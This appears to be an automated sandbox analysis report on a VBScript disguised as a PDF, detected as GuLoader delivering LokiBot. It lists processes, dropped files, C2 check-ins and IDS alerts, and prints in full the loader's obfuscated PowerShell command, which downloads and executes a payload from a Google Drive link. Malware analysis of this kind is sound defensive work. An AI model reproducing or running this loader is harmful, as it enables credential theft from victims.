10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll

5996

"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Arbejdsform.Met && echo t"

C:\Windows\SysWOW64\cmd.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll

6108

"C:\Program Files (x86)\windows mail\wabmig.exe"

C:\Program Files (x86)\Windows Mail\wabmig.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft (R) Contacts Import Tool

Exit code:

Version:

10.0.19041.3636 (WinBuild.160101.0800)

6732

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Hullabaloos Positionsangivelsen Scrab Claustrophobiac Kluntekro Shantungfrakkernes #>;$Ddstilhed='Dagligsprogsfilosofiers';<#Preguide Pone Amforaers udfoerslen Depilerede Conchie #>;$Fermis=$host.PrivateData;If ($Fermis) {$Hydrothorax++;}function Echinologist($Tailles){$kieselgur=$Tailles.Length-$Hydrothorax;for( $Originant=5;$Originant -lt $kieselgur;$Originant+=6){$Konsulaternes+=$Tailles[$Originant];}$Konsulaternes;}function Misrgt($Enjoins){ & ($Funeralizes) ($Enjoins);}$Eventualiteternes44=Echinologist 'Arse,MG nneo O kaz Non iVekselRadrelBegava A ko/Grand5Overa.B ode0Conce Konce(Ugli.WKr keiBugswnSalvodZool,oRekviw rydsOrnam andeN UngoTS.eln Huffa1Daint0wists.Milit0Ammon;Arbej Im reWSkaraiM.ljanMonos6Skrat4Sky t;Slgtn SlutvxBygue6Afbjn4Unc.l; pids Teresr Rillvmesom:Arbej1Ideam2Spejl1Skife.Bysv 0 Skol)Megar ChiliGChondeMeddec WagnkCykeloGifte/Insti2 Over0dygti1 A,tr0Attir0Modga1anste0Hnge.1Mdend ForbeF G rki IndorIndfrecobusf Si,eo Eksax U ug/Tvanm1Tolvt2scene1Heads.Choli0Gains ';$Discide=Echinologist 'Estrau Ur tSFornyEh,aneRDisen-Dea tA.goloGD tekEBuretNIsaleTH.mat ';$Chthonophagia=Echinologist 'UaflahSpanct FicutEveryp Lnn,sMa,ne:Forbj/Giant/ tyrid Forer LovpiBaccav vereStrug.HovedgGenbao AvocoJernhgjern lThe,neteeth.sy,afcImproo prrsmUmora/F,siou BleacUng n?BiplieC stixNglepp Fre oHydrorpileatArbej=BrnepdAbstro nfewS,tinnUnsc l FugtoForm aGyptodAplod&E stei Sq adTuris=Triet1UdstiOG saniBatrawRessoeTelevcI ratMUhens9 Amasi TibeuHjerns FluerUptru-Pent osamlipAnskaJSoli NSpectGArtisS diopUAfske7Pre,au ToguS,letfXCalypsEl,paAChrisjMis nTAssatu OpnagLefle8 M vibPartuQ .ipt ';$Daasemads=Echinologist 'Eig.t>obsku ';$Funeralizes=Echinologist 'D.kediDampbEK.ltuXforre ';$Garderofficers='Dagbder';$Rete = Echinologist ' ResueSvabecMonsthSonicoUnde. Inte%d mflaEfterp Flatp Sku dVenoua Furrt ongtaTroub%Nonfo\MisplAPrintrBankib B greStumfjkonfidGlycosskke fPintao MedfrCadmimKidna.FunarM ntioePe entStake vaa.n&Reven&Shone VigtieUdskrcSolidhOver.oPheno BildetP ogr ';Misrgt (Echinologist ' Sjus$HypocgJudgmlDossio ,egrb RisoaVortelAphod:Aegi,G Elver winsoMiaeovUprodssamueo N herPlet tErklaeM safr Var,ekoldsdKomedeMoppe=Overh(Tandlc OblimAggludChang Ufr h/ Co lcHyl e Tilfl$Ikon RDrifteTr.jet AmbeeRib,f)Forsg ');Misrgt (Echinologist ' Evol$UnpargAgterlHandeoPeytrbRetnia UngdlTre,v:gymnaA B cemUharmoKr,gvvRamulaC.emob ntenlskinneCenog= .tri$DoubtCBolsth Pa et IndbhAbdomo P.ecnClurioD,ylipShotwhTrimlaLatrig BarciMultiaNonin.Cic rsrgbomp Distl Snkei Wyndt Baga(Cater$ FratDAfloea ,rina Spinsstorme PlasmRestaaStilhdKubiksFaste) I tr ');Misrgt (Echinologist ' T,po[SerigNIns reClosetUndem.SkysoSF lkeetild rScar v yhei PoeccUreeleLerv PD uteoXylotiAmy,dnGeorgtHjemtMDuinha Be anBlinyaGeddegFemreeC romrLrer ]Sp ld:Trrev: PremSMidweeToit cPynteuBes.yrSc,ibi raadtSit.ayB.rerP Ult.rFri to IneftSymbioUndtacInhaloCrotclBorge Outt=Utopi Hvsse[BenetNUnoedeMuhamt usti.CadpaS Boeme.ontrcBrgsruLommerTur.ciBe.ent Prefy MatrPFedssrPulvioAdonitfrie o EnthcDinosopilhelc hobTS utnyUnderpPaakle D,sl] Toru:Skild:Bl mmT TeknlExpersBitte1Syste2Gel t ');$Chthonophagia=$Amovable[0];$Otohemineurasthenia239= (Echinologist 'Me ne$gangeGGenkeLBer.doTax,tBpligtaAfsliL Fo,l:Verdet njedAUnslopTh eaiLeukooarr gkSn ggaClinos Krsl=ManasNGruntECha uWD opo-beskyo.jergbWafflJHjhalEGarveC ,alutFll.s RagonSSidehy.edles Ch,vT StraeSquusmphson.,tarrNOsmogeArbejTOverc.KatalwslipcEMa thBByud c Diffl ypeIAfrydeCo.toNForreT');$Otohemineurasthenia239+=$Grovsorterede[1];Misrgt ($Otohemineurasthenia239);Misrgt (Echinologist 'Euroc$SubfiTUdvenaV.lgcpPan ri P choFiskekDopinapla,ssSpndb.BortfH Ra,he LektaDessidD ppeeMan mrBacchs Over[P ntu$BevilD Sed,iPlycys En ycOphobi algdPoplie Duft] Tran=Lysty$VisseE DemovUnfugeDes,rnPer et.lystuFllesaArbejlBeth iP ecot lelse,istetPresueKon ar precn SemieSondrsbinde4Car n4Retsm ');$vulcanising=Echinologist 'I mit$ araTBananaVir dpIm.asi,ntrkoSrstikCartoaUnadas Vejl.St,reDFarrootmme wAdjudnU dgalAlberoIdentaVaeggd T taFKrimiiVap elTopmee Bnde(Afsen$ LandCDiatohPo,ittAn lyhAtaraoAlaban uderoRockapHe.tihMi haa mpieg,trreiB sacaFluor,Cath,$ BrugSFu.unaQuoticFrilucBucklaFrem,tPantoePhantdJugos) Au o ';$Saccated=$Grovsorterede[0];Misrgt (Echinologist 'Sidde$Hueytg,tjdmlChinboPlankBSc reaKalkil Erhv:Hum rDKontriDugrusBlinkCReallOPletfVCal bEAnen rTilba=Vain (stabstForstE Be dsOrbitt E.id-AnalyP CommaRane T AcetHChori Acrot$ AndeS AlzhaOu plC TimecAfstiA AsunTSk tlEAfsttDAfgre)ikend ');while (!$Discover) {Misrgt (Echinologist 'Ba,ta$Un ragOligol albloSnustbsna.sa Strel ,nai:TrichPA,mrgiHabilfVarittrustieKingnnKommidMinise Jon sShi.e=Distr$ orlgtUdk tr,aneruEquipe Pred ') ;Misrgt $vulcanising;Misrgt (Echinologist ' DragSKogeut India Multrcr sst omm-hyoglS fje lBldgrehusfreMolehpVoldg Triv4Un,oo ');Misrgt (Echinologist 'Bogh,$ PerigMarmilAns.oo So abTop oa UnsolTen,a:PegboD IncriPodgisHypo.cSatiso Dub vDhubaeAftenrIndiv= B,bo(harmeT Sli eModkrsForretBrode- HypePcharmaPy alt kolehCla a Woma$WirycSFrbida,andicUngdoc Kr kaMaskitDen re Bir dHydro)Chain ') ;Misrgt (Echinologist 'Topng$Fermeg mo olQuisqoSinnebOrganaCocitl Besi:SdebaGCocu.einattlArthrafr,metAvissi TibinForglo GolfuDra,osQuillnUnytteScrapsStalwsLapse=Fortr$Sexfig ,rlilVaandoMlkeabElen.aMyrerlParfu:UnderkDisksuMyxedm HistmgtefdeCombirUn unfGarmeuPyrotlJallsdColla+Grani+Unend%Lftep$dollyALoek.mDobbeomicrovPrereaBrianbAs,ral joine.sagt.Heltec ,ffro.cameuCloudnTautotBuste ') ;$Chthonophagia=$Amovable[$Gelatinousness];}$Originantnfektionernes=327153;$Analysevrktjets=29478;Misrgt (Echinologist 'Gymna$InhabgSpro lHaandoAugusbLoy laBarbelUnder:Op reB Herma BetrgSlaafa tratom gneHi tolU,full PljeeNot,trUnindnRubi eMinersKenne Trans=P oto cratG DireeIndryt Terr-KilomCTils oS ormnPrebetEmotieReopenSmugltRet p Manxm$rin.lSA suraEclipc Kly,cRbdigaC pittnonscepapirdFradr ');Misrgt (Echinologist 'Vides$ utpog OverlfirhnoBerimbVandla zonel dkon:AmatrP UvoraKonstrFjer tHattyiCroupkBranda BorgmGollymCurtseu,nderCirc.aNonr t Udls Sabur=Grs n carti[VanfrSKilobyAvo,ts Tj,etM diceKrystmJi te.BevvyCSlveroKorpunFlosvvKhalieDis nr Uns,tCh ff]Oeill:Belli: P,rvFR,adgr DermoPseudm ZastB HestaAn oms Mi,ueRee.s6A sem4 erumSUr.ditProv.rLe.chiNdv,gnsplejgSmidi(I,pli$NeophB Mi.taTon ugL apfaStuditAs.erebrazelGeniilHekseeEnsterB ngnnLicheeUnrepsXant )Kam.e ');Misrgt (Echinologist ' Plan$Time gAilanlEkst.oHasarbbad tabrylll Br k: RoosKEileroRockenTritefPrj iuIrretnYamaldnoto e nderrLgtrieTo ngrDefen Cerem= ivej ,arla[CarilSSulfayPedansUnreftTsa,deF,rstmGe re.HundeTHospieSnri x Gropt Lrke.De,atE Fo tnFrforcTaxemoCreepdReseriNonconGonotgLeg t]Styrk: Ut,k:KonjaAbag.oS UdfoCMicroI BereICumul.JagteGTils.eTealetUnfaiS ncomtPyrolrdispeiUnbehnincorgProto( Reh.$O erdP,krigaBoggrr Ge rtWathfiKineskRegaiaGravemCompemRhab,e.reemrMedieaUps.etAm,lg)Reass ');Misrgt (Echinologist 'Tilse$ K,angReflelPjanko Beg bSjus.aUnstrl ddat:SaddlSGraveeKongesVed.iqNordsuLsniniLivsfbAstiga Femes erriLssedc rbor=Bonds$dampnKBevgeoFrasenHourifV.ljeuPebrenUnderdMena eEjendr Fetie St er Yder.Respes Br,gu Sk ubCanaisStrobtAe,oprTang iSammenTurm gFiske(Repul$ MicrOKontorSor.niPrepagP lsaiOrdren Du la Maken,egertDio.gnDuvesfUbemreHygrokPo metdveskiRasp.oResulnTwadde Titrr orgnUnpaselaagesTitan,Stra $CheckA FervnPseudaAtte,l triky DialsNonmaeAntiav,kyllr Br,skBelbstBevikjS olee MaustpreansA ten)Optio ');Misrgt $Sesquibasic;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

wscript.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

6736

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

Add for printing

Total events

13 402

Read events

13 402

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
6732	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cxx20sp5.ysr.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4108	wabmig.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA		der
		MD5:F4F2DB54D9A61A3996353E4DC781C7AB	SHA256:29BB22E77D832D5FD2589FB61CDB505D2578FA9B78D8E4CEE366055A97C84037
4108	wabmig.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_46BC208C523EEEE711F4A164CF2E33E0		binary
		MD5:8237956639E1A8691DEF419AA43D9A8C	SHA256:93FC2D3E59DD297B50A65E2221B1591AF07499F57B4A58E7FD0C656DDC7B7691
4108	wabmig.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199		der
		MD5:E935BC5762068CAF3E24A2683B1B8A88	SHA256:A8ACCFCFEB51BD73DF23B91F4D89FF1A9EB7438EF5B12E8AFDA1A6FF1769E89D
5148	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xb22rf10.15j.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4108	wabmig.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199		binary
		MD5:B47966CFEEFA59D5EC6A4BCCD5DF8DF4	SHA256:C7E5DE18CECDBBAF0213B640B375535317D881E37102AF2DCB26CB5C555B0A55
4108	wabmig.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6DA548C7E5915679F87E910D6581DEF1_058F778FC8346DE378B15A5652BAADD9		der
		MD5:C9B24CD717DEAA692078EF0F08532C48	SHA256:1BD18CF01DC04303B96E9E41D4D3E814831AE3B061BB782459F4D9BEE0DAB5BF
4108	wabmig.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA		binary
		MD5:07C176173C49AB3EF91DD5C01F7F5C95	SHA256:910D4244E09B16A193C45F495BFB412548707B74CE19768A5A1B9C185A798BD6
4108	wabmig.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6DA548C7E5915679F87E910D6581DEF1_058F778FC8346DE378B15A5652BAADD9		binary
		MD5:F5A38CFC2111572C9620BA08F1C779CE	SHA256:C6A54272173EB5AFBAE9EFF8720D4F96AA97B37E95134C759CB70BBCADD49483
4108	wabmig.exe	C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\0f5007522459c86e95ffcc62f32308f1_bb926e54-e3ca-40fd-ae90-2764341e7792		binary
		MD5:D898504A722BFF1524134C6AB6A5EAA5	SHA256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	200	172.217.16.195:80	http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDmcMw%2Fo03sIxABiVt5eEgl	unknown	—	—	whitelisted
—	—	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
—	—	GET	200	142.250.185.99:80	http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D	unknown	—	—	whitelisted
3116	svchost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
—	—	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
6604	svchost.exe	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
—	—	POST	500	137.184.191.215:80	http://137.184.191.215/index.php/check.php?s=am9ntjjw	unknown	—	—	unknown
—	—	GET	200	142.250.186.35:80	http://c.pki.goog/r/r1.crl	unknown	—	—	whitelisted
—	—	GET	200	172.217.16.195:80	http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDbEwnphZvrGArz%2BV5lisDz	unknown	—	—	whitelisted
—	—	POST	500	137.184.191.215:80	http://137.184.191.215/index.php/check.php?s=am9ntjjw	unknown	—	—	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
6604	svchost.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
3888	svchost.exe	239.255.255.250:1900	—	—	—	whitelisted
—	—	192.168.100.255:137	—	—	—	whitelisted
—	—	20.189.173.24:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	US	unknown
2120	MoUsoCoreWorker.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
1804	RUXIMICS.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
6732	powershell.exe	142.250.186.110:443	drive.google.com	GOOGLE	US	shared
6732	powershell.exe	142.250.186.33:443	drive.usercontent.google.com	GOOGLE	US	whitelisted
6604	svchost.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	4.231.128.59 40.127.240.158 51.104.136.2	whitelisted
google.com	142.250.186.174	whitelisted
drive.google.com	142.250.186.110	shared
drive.usercontent.google.com	142.250.186.33	whitelisted
www.microsoft.com	95.101.149.131 184.30.21.171	whitelisted
login.live.com	20.190.159.2 20.190.159.73 40.126.31.71 40.126.31.67 20.190.159.75 20.190.159.68 20.190.159.71 40.126.31.69	whitelisted
ocsp.digicert.com	192.229.221.95	whitelisted
slscr.update.microsoft.com	20.12.23.50	whitelisted
fe3cr.delivery.mp.microsoft.com	13.85.23.206	whitelisted
ocsp.pki.goog	142.250.185.99	whitelisted

Threats

PID	Process	Class	Message
—	—	A Network Trojan was detected	ET MALWARE LokiBot User-Agent (Charon/Inferno)
—	—	Malware Command and Control Activity Detected	ET MALWARE LokiBot Checkin
—	—	A Network Trojan was detected	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
—	—	A Network Trojan was detected	ET MALWARE LokiBot User-Agent (Charon/Inferno)
—	—	Malware Command and Control Activity Detected	ET MALWARE LokiBot Checkin
—	—	A Network Trojan was detected	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
—	—	A Network Trojan was detected	ET MALWARE LokiBot User-Agent (Charon/Inferno)
—	—	Malware Command and Control Activity Detected	ET MALWARE LokiBot Checkin
—	—	Malware Command and Control Activity Detected	ET MALWARE LokiBot Request for C2 Commands Detected M1
—	—	Malware Command and Control Activity Detected	ET MALWARE LokiBot Request for C2 Commands Detected M2

Add for printing

No debug info

General Info

Happy Fiestas Patrias·pdf.vbs

A08909DD22F1EF8EEE277B3F178A65BD

30D67F8107A95D9A779AA010268421D3ECDDB611

EED0935D0176FBB012006F4E41DE769A2EF84FCB092F06B62BE7CEB250D895D9

768:hXwI+o49dnoX82Q/YoTprXzNQvD3L8LbEjWI:SI+5LX2NoTdq83EyI

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

GULOADER has been detected

SUSPICIOUS

Base64-obfuscated command line is found

Starts POWERSHELL.EXE for commands execution

Runs shell command (SCRIPT)

Starts CMD.EXE for commands execution

Gets or sets the security protocol (POWERSHELL)

Uses base64 encoding (POWERSHELL)

Executable content was dropped or overwritten

Converts a specified value to a byte (POWERSHELL)

Process drops legitimate windows executable

INFO

The process uses the downloaded file

Gets data length (POWERSHELL)

Disables trace logs

Uses string split method (POWERSHELL)

Creates or changes the value of an item property via Powershell

Checks proxy server information

Converts byte array into ASCII string (POWERSHELL)

Script raised an exception (POWERSHELL)

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Information

Modules

Information

Modules

Information

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings